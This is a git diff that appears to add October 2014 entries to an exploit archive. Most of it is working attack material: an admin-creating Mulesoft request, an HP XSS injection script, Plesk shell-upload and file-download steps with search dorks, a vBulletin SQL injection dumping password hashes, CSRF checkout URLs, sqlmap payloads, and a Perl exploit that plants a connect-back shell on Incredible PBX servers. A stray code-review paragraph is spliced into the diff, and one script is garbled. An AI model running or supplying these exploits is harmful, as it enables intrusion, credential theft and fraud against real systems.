Load Flags[LOAD_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://localhost/] + Connection[keep-alive] + Response Header: + Accept-Ranges[bytes] + Content-Length[0] + Date[Tue, 21 Oct 2014 15:42:36 GMT] + + +Reference(s): +http://localhost/?action= +http://localhost/?action=directory&path= + + +Solution - Fix & Patch: +======================= +The vulnerability can be patched by a secure restriction implementation and filter mechanism on new folder inputs. +After the restriction the input needs to be encoded or parsed to prevent the persistent script code execution in the delete function. + + +Security Risk: +============== +The security risk of the persistent input validation web vulnerability in the delete item function is estimated as medium. + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed +or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable +in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab +or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for +consequential or incidental damages so the foregoing limitation may not apply. 
We do not approve or encourage anybody to break any vendor licenses, +policies, deface websites, hack into databases or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to +electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by +Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website +is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact +(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™ + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM +SERVICE: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com + +COMPANY: Evolution Security GmbH +BUSINESS: www.evolution-sec.com + + diff --git a/platforms/jsp/webapps/35079.txt b/platforms/jsp/webapps/35079.txt new file mode 100755 index 000000000..e77317731 --- /dev/null +++ b/platforms/jsp/webapps/35079.txt 
@@ -0,0 +1,53 @@ +Mulesoft ESB Runtime 3.5.1 Authenticated Privilege Escalation ? Remote Code +Execution + + + + Mulesoft ESB Runtime 3.5.1 allows any arbitrary authenticated user to +create an administrator user due to a lack of permissions check in the +handler/securityService.rpc endpoint. The following HTTP request can be +made by any authenticated user, even those with a single role of Monitor. + + + POST /mmc-3.5.1/handler/securityService.rpc HTTP/1.1 + +Host: 192.168.0.22:8585 + +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0) +Gecko/20100101 Firefox/31.0 + +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + +Accept-Language: en-US,en;q=0.5 + +Accept-Encoding: gzip, deflate + +Content-Type: text/x-gwt-rpc; charset=utf-8/ + +Referer: http://192.168.0.22:8585/mmc-3.5.1/index.jsp + +Content-Length: 503 + +Cookie: JSESSIONID=CEB49ED5E239CB7AB6B7C02DD83170A4; + +Connection: keep-alive + +Pragma: no-cache + +Cache-Control: no-cache + + 7|0|15|http://192.168.0.22:8585/mmc-3.5.1/com.mulesoft.mmc.MMC/ +|5192695B02944BAAB195B91AB3FDDA48|org.mule.galaxy.web.rpc.RemoteSecurityService|addUser|org.mule.galaxy.web.rpc.WUser/4112688705|java.lang.String/2004016611| +fdsafdsa@fdsafdsa.com +|java.util.ArrayList/4159755760|298e8098-ff3e-4d13-b37e-3f3d33193ed9|ed4cbe90-085d-4d44-976c-436eb1d78d16|ccd8aee7-30bb-42e1-8218-cfd9261c7af9|d63c1710-e811-4c3c-aeb6-e474742ac084|fdsa|notadmin|notpassword|1|2|3|4|2|5|6|5|7|8|4|6|9|6|10|6|11|6|12|0|13|0|0|14|15| + + + This request will create an administrator with all roles with a username +of notadmin and a password of notpassword. Many vectors of remote code +execution are available to an administrator. Not only can an administrator +deploy WAR applications, they can also evaluate arbitrary groovy scripts +via the web interface. + +-- +http://volatile-minds.blogspot.com -- blog +http://www.volatileminds.net -- website \ No newline at end of file 
diff --git a/platforms/linux/dos/35081.txt b/platforms/linux/dos/35081.txt
new file mode 100755
index 000000000..b8b415433
--- /dev/null
+++ b/platforms/linux/dos/35081.txt
@@ -0,0 +1,61 @@
+Many shell users, and certainly a lot of the people working in
+computer forensics or other fields of information security, have a
+habit of running /usr/bin/strings on binary files originating from the
+Internet. Their understanding is that the tool simply scans the file
+for runs of printable characters and dumps them to stdout - something
+that is very unlikely to put you at any risk.
+
+It is much less known that the Linux version of strings is an integral
+part of GNU binutils, a suite of tools that specializes in the
+manipulation of several dozen executable formats using a bundled
+library called libbfd. Other well-known utilities in that suite
+include objdump and readelf.
+
+Perhaps simply by the virtue of being a part of that bundle, the
+strings utility tries to leverage the common libbfd infrastructure to
+detect supported executable formats and "optimize" the process by
+extracting text only from specific sections of the file.
+Unfortunately, the underlying library can be hardly described as safe:
+a quick pass with afl [1] (and probably with any other competent
+fuzzer) quickly reveals a range of troubling and likely exploitable
+out-of-bounds crashes due to very limited range checking. In binutils
+2.24, you can try:
+
+$ wget http://lcamtuf.coredump.cx/strings-bfd-badptr2
+
+EDB Mirror: http://www.exploit-db.com/sploits/35081
+
+...
+$ strings strings-bfd-badptr2
+Segmentation fault
+...
+strings[24479]: segfault at 4141416d ip 0807a4e7 sp bf80ca60 error 4
+in strings[8048000+9a000]
+...
+ while (--n_elt != 0)
+ if ((++idx)->shdr->bfd_section)
+ elf_sec_group (idx->shdr->bfd_section) = shdr->bfd_section;
+...
+(gdb) p idx->shdr
+$1 = (Elf_Internal_Shdr *) 0x41414141
+
+In other words, this code appears to first read and then write to an
+arbitrary pointer (0x41414141) taken from the input file.
Many Linux
+distributions ship strings without ASLR, making potential attacks
+easier and more reliable - a situation reminiscent of one of
+CVE-2014-6277 in bash [2].
+
+Interestingly, the problems with the utility aren't exactly new; Tavis
+spotted the first signs of trouble in other parts of libbfd some nine
+years ago [3].
+
+In any case: the bottom line is that if you are used to running
+strings on random files, or depend on any libbfd-based tools for
+forensic purposes, you should probably change your habits. For strings
+specifically, invoking it with the -a parameter seems to inhibit the
+use of libbfd. Distro vendors may want to consider making the -a mode
+default, too.
+
+[1] Obligatory plug: http://code.google.com/p/american-fuzzy-lop/
+[2] http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html
+[3] https://bugs.gentoo.org/show_bug.cgi?id=91398
diff --git a/platforms/multiple/remote/35062.txt b/platforms/multiple/remote/35062.txt
new file mode 100755
index 000000000..7e80e2ac4
--- /dev/null
+++ b/platforms/multiple/remote/35062.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45245/info
+
+RDM Embedded is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. The issue affects the 'lm_tcp' service.
+
+Successful exploits may allow an attacker to execute arbitrary code in the context of a user running an application that uses the affected library. Failed exploit attempts may crash the application, denying service to legitimate users.
+
+The issue affects lm_tcp <= 9.0.0 0248.18.0.0; other versions may also be affected.
+
+http://www.exploit-db.com/sploits/35062.zip
\ No newline at end of file
diff --git a/platforms/multiple/webapps/35076.py b/platforms/multiple/webapps/35076.py
new file mode 100755
index 000000000..7bb2dc826
--- /dev/null
+++ b/platforms/multiple/webapps/35076.py
@@ -0,0 +1,89 @@ +#!/usr/bin/python +# Exploit Title: HP Operations Agent / HP Communications Broker Remote XSS iFrame Injection +# Date: 10/16/2014 +# Exploit Author: Matt Schmidt (Syph0n) +# Vendor Homepage: www.hp.com +# Version: HP Operations Manager/Operations Agent / OpenView Communications Broker < 11.14 +# Tested on: Windows 7, SunOS, RHEL Linux +# CVE : CVE-2014-2647 +# +# This script was written to exploit a remote cross-site scripting vulnerability in HP Communication Broker/ HP Operations Agent. +# This vulnerability is stored in nature until the connection is terminated as it adds the XSS string to the User Agent. +# Vulnerable page: /Hewlett-Packard/OpenView/BBC/status +# This Exploit injects a Hidden iFrame which can be used for Social Engineering attacks as a browser exploit or other malicious URL can be embedded. +# +# Vulnerability Discovered by: Matt Schmidt (Syph0n) +# Timeline: +# 07/07/2014 - Submitted Discovery to ZDI +# 07/08/2014 - ZDI decided not to accept this vulnerability and directed to HP SSRT. 
+# 07/12/2014 - Contacted HP SSRT +# 07/13/2014 - HP SSRT assigned Case SSRT101643 +# 07/17/2014 - Submitted Discovery and PoC exploit code to HP SSRT +# 07/30/2014 - Followed up with HP +# 07/31/2014 - Response from HP Indicating they need more time for Engineering to look into the submission +# 08/13/2014 - Followed up with HP +# 08/13/2014 - Response from HP stating that this issue will be resolved in version OA 11.14 +# 08/24/2014 - Followed up with HP on CVE Identified and Disclosure Date +# 08/31/2014 - Followed up with HP again as no response to previous email +# 09/04/2014 - Followed up with HP again as no response to previous two emails +# 09/14/2014 - Followed up with HP again as no response to previous three emails +# 09/16/2014 - HP Responded stating they where "sorting out various items concerning this issue" +# 10/01/2014 - Followed up with HP asking for Disclosure Date and CVE Identifier +# 10/06/2014 - HP Responded indicating a disclosure was due out the week of the 6th. +# 10/15/2014 - HP Issued the following Security Bulletin regarding this vulnerability - https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04472444 +# 10/15/2014 - CVE-2014-2647 Issued for this vulnerability + +import argparse, socket, sys + + +# Define Help Menu +if (len(sys.argv) < 2) or (sys.argv[1] == '-h') or (sys.argv[1] == '--help'): + print '\nUsage: ./exploit.py "+ agent +"\r\n\r\n" + + # Create Socket and check connection to target. + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + print "[*] Checking host: " +host+"\n" + try: + s.connect((host, int(port))) + except Exception as e: + print "[+] Error Connecting: ", e + exit() + print "[*] Sending payload to HP OpenView HTTP Communication host " +host+"\n" + + # Keep connection alive + while payload != 'q': + s.send(payload.encode()) + + data = s.recv(1024) + print "[*] Payload Sent." 
+ + payload = raw_input("\n[+] Keeping Connection Open ([q]uit):") + return + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/platforms/php/webapps/34593.txt b/platforms/php/webapps/34593.txt new file mode 100755 index 000000000..d7406fb05 --- /dev/null +++ b/platforms/php/webapps/34593.txt 
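Review bot: In the keep-alive loop `data = s.recv(1024)` stores the server's reply but nothing ever reads `data`, so the assignment is dead and the unused name hides the fact that the response is never checked; either drop the assignment or use the value. The socket opened before the loop is also never released — an `s.close()` before the trailing `return` would do it. The connection-failure branch prints with the `[+]` prefix that the rest of the output uses for progress (`[+] Keeping Connection Open`), which makes failures easy to miss when scanning the log. The enclosing function's signature and most of this hunk's body are not visible here (the text between angle brackets was stripped from the page), so these points apply only to the visible tail.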
@@ -0,0 +1,75 @@ +#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +# Title : Multiple Vulnerabilities in Parallels® Plesk Sitebuilder +# Author : alieye +# vendor : http://www.parallels.com/ +# Contact : cseye_ut@yahoo.com +# Risk : High +# Class: Remote +# +# Google Dork: +# inurl::2006/Sites ext:aspx +# inurl::2006 inurl:.ashx?mediaid +# intext:"© Copyright 2004-2007 SWsoft." ext:aspx +# inurl:Wizard/HostingPreview.aspx?SiteID +# +# Date: 23/07/2014 +# os : windows server 2003 +# poc video clip : http://alieye.persiangig.com/video/plesk.rar/download +# +# version : for uploading shell (Parallels® Plesk panel 9.5 - Parallels® Plesk Sitebuilder 4.5) Copyright 2004-2010 +# version : for other bug (Parallels® Plesk panel 9.5 - Parallels® Plesk Sitebuilder 4.5) Copyright 2004-2014 +#++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + + +1-bypass loginpage (all version) +http://victim.com:2006/login.aspx +change url path to http://victim.com:2006/wizard + +--------------------------------------------------------- + +2-uploading shell via Live HTTP Headers(Copyright 2004-2010) + + +Tools Needed: Live HTTP Headers, Backdoor Shell + +Step 1: Locate upload form on logo upload section in http://victim.com:2006/Wizard/DesignLayout.aspx +Step 2: Rename your shell to shell.asp.gif and start capturing data with +Live HTTP Headers +Step 3: Replay data with Live HTTP Headers - +Step 4: Change [Content-Disposition: form-data; name="ctl00$ContentStep$FileUploadLogo"; filename="shell.asp.gif"\r\n] to [Content-Disposition: form-data; name="ctl00$ContentStep$FileUploadLogo"; filename="shell.asp.asp"\r\n] +Step 5: go to shell path: +http://victim.com:2006/Sites/GUID Sitename created/App_Themes/green/images/shell_asp.asp + +--------------------------------------------------------- + +3-Arbitrary File Download Vulnerability(all version) +You can download any file from your target + +http://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=GUID Sitename 
created&p=filename + +example: +http://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=4227d5ca-7614-40b6-8dc6-02460354790b&p=web.config + +--------------------------------------------------------- + +4-xss(all version) +you can inject xss code in all module of this page http://victim.com:2006/Wizard/Edit.aspx +goto this page (edit.aspx), click on one module (Blog-eShop-Forum-...) then goto "Add New Category" and insert xss code in Category description and .... Enjoy :) + +--------------------------------------------------------- + +5-not authentication for making a website(all version) +making malicious page and phishing page with these paths +http://victim.com:2006/Wizard/Pages.aspx +http://victim.com:2006/Wizard/Edit.aspx + +#++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +[#] special members: ZOD14C , 4l130h1 , bully13 , 3.14nnph , amir +[#] Thanks To All cseye members and All Iranian Hackers +[#] website : http://cseye.vcp.ir/ +#++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +[#] Spt Tnx To Master of Persian Music: Hossein Alizadeh +[#] Hossein Alizadeh website : http://www.hosseinalizadeh.net/ +[#] download ney-nava album : http://dnl1.tebyan.net/1388/02/2009052010245138.rar +#++++++++++++++++++++++++++++++++++++++++++++++++++++++++ \ No newline at end of file diff --git a/platforms/php/webapps/34717.txt b/platforms/php/webapps/34717.txt new file mode 100755 index 000000000..3460ee77c --- /dev/null +++ b/platforms/php/webapps/34717.txt 
@@ -0,0 +1,31 @@ +#Title: vBulletin Verify Email Before Registration Plugin - SQL Injection +#Date: September 19 2014 +#Version: Any vBulletin 4.*.* version which has the plugin installed. +#Plugin: http://www.vbulletin.org/forum/showthread.php?t=294164 +#Author: Dave (FW/FG) + +The vulnerability resides in the register_form_complete hook, and some +other hooks. +The POST/GET data is not sanitized before being used in queries. + +SQL injection at: +http://example.com/register.php?so=1&emailcode=[sqli] + +PoC: +http://example.com/register.php?so=1&emailcode=1' UNION SELECT null, +concat(username,0x3a,password,0x3a,salt), null, null, null, null FROM +user WHERE userid = '1 + +Now look at the source of the page and find: + + + +Vulnerable hooks: +profile_updatepassword_complete (Email field when you want to change +your email address after being logged in.) +register_addmember_complete (After submitting the final registration form.) +register_addmember_process +register_form_complete (This example) +register_start (Email confirmation form at register.php) diff --git a/platforms/php/webapps/34965.txt b/platforms/php/webapps/34965.txt new file mode 100755 index 000000000..227e3964f --- /dev/null +++ b/platforms/php/webapps/34965.txt 
@@ -0,0 +1,47 @@ +# Exploit Title: RBS Change Complet Open Source multiple CSRF vulnerabilities POST and GET +# Date: 10/10/2014 +# Exploit Author: KrustyHack +# Vendor Homepage: http://www.rbschange.fr/ +# Software Link: http://www.rbschange.fr/addons/distributions/RBS-Change-complet-Open-Source,67203.html +# Version: 3.6.8 +# Tested on: Chrome, Firefox + +DESCRIPTION +=========== + +Multiple CSRF vulnerabilities into RBS CHange Complet Open Source CMS which allow an attacker to tricks a regular logged in user by executing basket related commands like adding a product to the basket, setting a new shipping address, setting delivery mode, confirm basket and in some case confirm payment (tested with payment by check), ... + +These tricks can be done by an HTML POST form or by a simple GET request (a link that the victims click on, an image that the victims see, ...). + +HOW TO +====== + +First, the attacker need to know some paramaters as shopId, productId and other forms variables wich may differ regard to the CMS installation. It's not very difficult, he just need to register an account and look for a product then pick the differents variables by inspecting the HTML code. + +He need to look for all the checkout process urls wich can differ on all RBS Change installation (due to urls rewritting). + +In these examples we use the demo.rbschange.fr website wich is the demonstration site of the CMS. + +Text marked [VAR] need to be modified by the attacker and may need HTML code inspection. 
+ + +- Add to basket: /fr/action/order/AddToCart?quantity=1&shopId=SHOPID&productId=PRODUCTID + +- Checkout: /fr/website/Mon-panier,13494.html?orderParam[website_BlockAction_submit][cartb_9][Order]="Je commande" GET OK + +- Setting the shipping address: /fr/website/Commande-Adresse,13502.html?orderParam[billing-registered]=15&orderParam[billing-firstname]=[VICTIMFIRSTNAME]&orderParam[billing-lastname]=[VICTIMLASTNAME]&orderParam[billing-addressline1]="[VICTIMSTREET]"&orderParam[billing-zipcode]=[VICTIMZIPCODE]&orderParam[billing-city]=[VICTIMCITY]&orderParam[billing-country]=[COUNTRYCODE]&orderParam[shipping-usesameaddress]=0&orderParam[shipping-registered]=15&orderParam[shipping-firstname]=Krusty&orderParam[shipping-lastname]=Hack&orderParam[shipping-addressline1]="15, rue du oui"&orderParam[shipping-zipcode]=75000&orderParam[shipping-city]=Paris&orderParam[shipping-country]=[COUNTRYCODE]&orderParam[submited]=99k&orderParam[website_BlockAction_submit][stdAddressStepb_9][nextStep]="Continuer la commande" + +- Setting delivery mode: /fr/website/Commande-Livraison,13503.html?orderParam[shippingFilterId]=[SHIPPINGFILTERID]&orderParam[website_BlockAction_submit][stdShippingStepb_9][nextStep]="Continuer la commande" + +- Setting payment method: http://demo.rbschange.fr/fr/website/Commande-Paiement.html?orderParam[paymentFilterId]=[PAYMENTFILTERID]&orderParam[website_BlockAction_submit][stdBillingStepb_9][nextStep]="Continuer la commande" + +- Confirm payment (here it's a payment by check): http://demo.rbschange.fr/fr/action/payment/BankResponseCheque?accept=1&paymentParam%5Baccept%5D=1 + +- And it's done. All the checkout process was done. + +Warning: nextStep (e.g: orderParam[website_BlockAction_submit][stdBillingStepb_9][nextStep]="Continuer la commande") variables may differ according to the language used into the website. HTML code inspection again ! :) + +WHY +=== + +All the forms doesn't use neither proper verification of HTTP request origin nor CSRF token. 
And all forms allow both GET and POST request. \ No newline at end of file diff --git a/platforms/php/webapps/35046.txt b/platforms/php/webapps/35046.txt new file mode 100755 index 000000000..31bffaad1 --- /dev/null +++ b/platforms/php/webapps/35046.txt @@ -0,0 +1,57 @@ + + + + + + + +
+ +
+
+
diff --git a/platforms/php/webapps/35066.txt b/platforms/php/webapps/35066.txt
new file mode 100755
index 000000000..e72ae8c1d
--- /dev/null
+++ b/platforms/php/webapps/35066.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45266/info
+
+The Processing Embed plugin for Wordpress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+WordPress Processing Embed plugin 0.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wordpress/wp-content/plugins/wordpress-processing-embed/data/popup.php?pluginurl=%3Cscript%3Ealert(0)%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/35067.txt b/platforms/php/webapps/35067.txt
new file mode 100755
index 000000000..655cdbade
--- /dev/null
+++ b/platforms/php/webapps/35067.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45267/info
+
+The Safe Search plugin for Wordpress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Safe Search 0.7 is vulnerable; other versions may also be affected. 2010-12-08
+
+http://www.example.com/wordpress/wp-content/plugins/wp-safe-search/wp-safe-search-jx.php?v1=%3Cscript%3Ealert(0)%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/35072.txt b/platforms/php/webapps/35072.txt
new file mode 100755
index 000000000..4c32b89cd
--- /dev/null
+++ b/platforms/php/webapps/35072.txt
@@ -0,0 +1,37 @@ +source: http://www.securityfocus.com/bid/45276/info + +The Embedded Media Field, Media: Video Flotsam, and Media: Audio Flotsam modules for Drupal are prone to multiple remote vulnerabilities, including: + +1. An HTML-injection vulnerability +2. An arbitrary-file-upload vulnerability. + +An attacker could exploit these vulnerabilities to execute arbitrary script code in a user's browser in the context of the affected site or execute arbitrary code on the server. + +The following products and versions are affected: + +Embedded Media Field module for Drupal 6.x versions prior to 6.x-1.26 and 6.x-2.4, and for Drupal 5.x versions prior to 5.x-1.12 +Media: Video Flotsam module for Drupal 6.x versions prior to 6.x-1.2 +Media: Audio Flotsam module for Drupal 6.x versions prior to 6.x-1.1 + +1. Install Drupal 6-19, CCK module, and Embedded Media Field module version 6.x-1.25 +2. Enable the Content, Embedded Media Field, Embedded Audio Field modules from ?q=/admin/build/modules +3. Alter the default 'Story' content type at ?q=admin/content/node-type/story/fields +4. Add a 'New Field' in the form at the bottom of this page with the label 'audio' the field name 'field_audio' the type 'Embedded Audio' and the form element '3rd Party Aduio' then click the 'Save' button +5. Configure the new video field from ?q=admin/content/node-type/story/fields/field_video +6. Select all content providers for convenience and click 'Save field settings' button at the bottom of the form +7. Create a new piece of story content from ?q=node/add/story entering arbitrary values. +8. Enter "'/>.png" and click the 'Upload' button +8. Observe the rendered javascript alert dialogue +9. Click the 'Save' button so that the XSS persists to future node edits \ No newline at end of file diff --git a/platforms/php/webapps/35073.txt b/platforms/php/webapps/35073.txt new file mode 100755 index 000000000..6406bf0f4 --- /dev/null +++ b/platforms/php/webapps/35073.txt 
@@ -0,0 +1,67 @@ +###################### + +# Exploit Title : CP Multi View Event Calendar 1.01 SQL Injection Vulnerability + +# Exploit Author : Claudio Viviani + +# Software Link : https://downloads.wordpress.org/plugin/cp-multi-view-calendar.zip + +# Date : 2014-10-23 + +# Tested on : Windows 7 / Mozilla Firefox + Windows 7 / sqlmap (0.8-1) + Linux / Mozilla Firefox + Linux / sqlmap 1.0-dev-5b2ded0 + +###################### + + +# Description + +CP Multi View Event Calendar 1.01 suffers from SQL injection vulnerability + +calid variable is not sanitized. + +###################### + +# PoC + +http://localhost/?cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1 [Sqli] + +# Sqlmap + +--- +Place: GET +Parameter: calid + Type: boolean-based blind + Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) + Payload: cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1 RLIKE (SELECT (CASE WHEN (9095=9095) THEN 1 ELSE 0x28 END)) + + Type: error-based + Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause + Payload: cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1 AND (SELECT 3807 FROM(SELECT COUNT(*),CONCAT(0x7171736971,(SELECT (CASE WHEN (3807=3807) THEN 1 ELSE 0 END)),0x716b716671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) + + Type: UNION query + Title: MySQL UNION query (NULL) - 14 columns + Payload: cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171736971,0x6f7642724e6743615973,0x716b716671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# + + Type: AND/OR time-based blind + Title: MySQL < 5.0.12 AND time-based blind (heavy query) + Payload: cpmvc_id=1&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1 AND 8168=BENCHMARK(5000000,MD5(0x4a4a6d41)) +--- + + +##################### + +Discovered By : Claudio Viviani + http://www.homelab.it + + info@homelab.it + homelabit@protonmail.ch + + 
https://www.facebook.com/homelabit + https://twitter.com/homelabit + https://plus.google.com/+HomelabIt1/ + https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww + +##################### \ No newline at end of file diff --git a/platforms/php/webapps/35080.pl b/platforms/php/webapps/35080.pl new file mode 100755 index 000000000..8346f7c3b --- /dev/null +++ b/platforms/php/webapps/35080.pl 
@@ -0,0 +1,186 @@ +#!/usr/bin/perl +# +# Title: Incredible PBX remote command execution exploit +# Author: Simo Ben youssef +# Contact: Simo_at_Morxploit_com +# Discovered: 1 September 2014 +# Coded: 21 October 2014 +# Published: 21 October 2014 +# MorXploit Research +# http://www.MorXploit.com +# Vendor: PBX in a Flash +# Vendor url: http://pbxinaflash.net/ +# Software: Incredible PBX 11 +# Version: 2.0.6.5.0 +# Product url: http://incrediblepbx.com/ +# Vulnerable file: reminders/index.php +# +# About (from their website): +# Incredible PBX is a secure and feature-rich implementation of the terrific Asterisk® PBX. By rethinking the PBX security model from the +# ground up, Incredible PBX was engineered to provide rock-solid security while delivering the most comprehensive collection of Asterisk +# utilities available on the planet including free calling in the U.S. and Canada courtesy of Google Voice. +# +# Description: +# reminders/index.php which ships with Incredible PBX suffers from a command execution vulnerability, allowing an authenticated user to +# inject commands as the asterisk user. +# +# Vulnerable code: +# 484: system $retcode3 = system("sox $tmpwave -r 8000 -c 1 $newgsm"); +# 472: $tmpwave = "/tmp/$token.wav"; +# 469: $token = md5(uniqid("")); +# 483: $newgsm = "/var/lib/asterisk/sounds/custom/" . $APPTTIME . "." . $APPTDT . "." . $APPTPHONE . ".gsm"; +# 381: $APPTTIME = str_replace(array(chr(13), chr(10), "<", ">"), "", $APPTTIME); +# 375: $APPTTIME = $_REQUEST['APPTHR'] . $_REQUEST['APPTMIN']; +# 380: $APPTDT = str_replace(array(chr(13), chr(10), "<", ">"), "", $APPTDT); +# 374: $APPTDT = $_REQUEST['APPTYR'] . $_REQUEST['APPTMO'] . 
$_REQUEST['APPTDA']; +# 382: $APPTPHONE = str_replace(array(chr(13), chr(10), "<", ">", " ", "(", ")", "-", "."), "", $APPTPHONE); +# 376: $APPTPHONE = $_REQUEST['APPTPHONE']; +# +# As you can see, none of user input sent through $_REQUEST[] parameters is being validated/sanitized before being passed it to system(); +# +# Exploit: +# As PoC, the below perl code will try to exploit $_REQUEST['APPTMIN'] to inject a python connect back shell. +# +# Note: +# Access to reminders/index.php requires 'maint' password, in the exploit code we have used the default installation password which is +# 'password'. +# +# Demo: +# ==================================================== +# --- Incredible PBX remote command execution exploit +# --- By: Simo Ben youssef +# --- MorXploit Research www.MorXploit.com +# ==================================================== +# [*] MorXploiting http://10.0.0.20/reminders/index.php +# [+] Sent payload! Waiting for connect back shell ... +# sh: no job control in this shell +# sh-4.1$ id; cat /etc/issue +# id; cat /etc/issue +# uid=498(asterisk) gid=497(asterisk) groups=497(asterisk) +# CentOS release 6.5 (Custom) on \m +# Welcome to PBX in a Flash - Green +# Please log in to continue +# ****************************************** +# Your IP Address is: +# +# 10.0.0.20 +# ****************************************** +# +# Download: +# http://www.morxploit.com/morxploits/morxincpbx.pl +# +# Requires LWP::UserAgent +# apt-get install libwww-perl +# yum install libwww-perl +# perl -MCPAN -e 'install Bundle::LWP' +# For SSL support: +# apt-get install liblwp-protocol-https-perl +# yum install perl-Crypt-SSLeay +# +# Author disclaimer: +# The information contained in this entire document is for educational, demonstration and testing purposes only. +# Author cannot be held responsible for any malicious use or damage. Use at your own risk. + +use LWP::UserAgent; +use MIME::Base64; +use IO::Socket; +use strict; + +sub banner { +system(($^O eq 'MSWin32') ? 
'cls' : 'clear'); +print "====================================================\n"; +print "--- Incredible PBX remote command execution exploit\n"; +print "--- By: Simo Ben youssef \n"; +print "--- MorXploit Research www.MorXploit.com\n"; +print "====================================================\n"; +} + +if (!defined ($ARGV[0] && $ARGV[1] && $ARGV[2])) { +banner(); +print "perl $0 \n"; +print "perl $0 http://10.0.0.16 10.0.0.2 31337\n"; +exit; +} + +my $host = $ARGV[0]; +my $vuln = "reminders/index.php"; +my $cbhost = $ARGV[1]; +my $cbport = $ARGV[2]; +my $defuser = "maint"; # Default maint user +my $defpass = "password"; # Default maint pass +my $string = "$defuser:$defpass"; +my $host2 = "http://localhost:81"; +my $encoded = encode_base64($string); +$| = 1; +$SIG{CHLD} = 'IGNORE'; + +my $l_sock = IO::Socket::INET->new( +Proto => "tcp", +LocalPort => "$cbport", +Listen => 1, +LocalAddr => "0.0.0.0", +Reuse => 1, +) or die "[-] Could not listen on $cbport: $!\n"; + +sub randomagent { +my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0', +'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0', +'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)', +'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36', +'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36', +'Mozilla/5.0 (X11; Linux x86_64) 